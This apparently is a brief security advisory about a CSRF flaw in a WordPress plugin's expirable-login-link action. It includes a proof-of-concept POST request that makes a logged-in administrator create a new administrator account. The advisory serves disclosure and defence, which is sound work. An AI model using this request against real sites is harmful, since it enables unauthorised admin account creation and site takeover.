The plugin does not protect its ftlpp-ext-expirable-login-link action against CSRF attacks, allowing an unauthenticated attacker to add users of any role on their behalf by tricking a logged in administrator to submit a crafted request.
POST /wp-admin/admin-ajax.php?action=ftlpp-ext-expirable-login-link HTTP/1.1 Content-Type: application/json Cookie: [Admin+] {“firstName":“Evil”,“email”:"[email protected]”,“role”:“administrator”,“accountLinkExpiry”:“999”}